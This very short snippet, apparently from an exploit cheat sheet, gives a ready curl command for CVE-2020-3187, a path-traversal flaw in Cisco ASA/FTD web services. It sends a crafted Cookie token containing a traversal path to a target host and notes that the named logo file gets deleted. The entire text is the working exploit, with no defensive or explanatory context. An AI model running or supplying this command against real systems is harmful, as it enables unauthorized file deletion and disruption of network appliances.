CVE-2020-3187 curl -H "Cookie: token=. ./+CSOU+/csco_logo.gif" https://target.com/+CSCOE+/session_password.html (logo.gif will get deleted)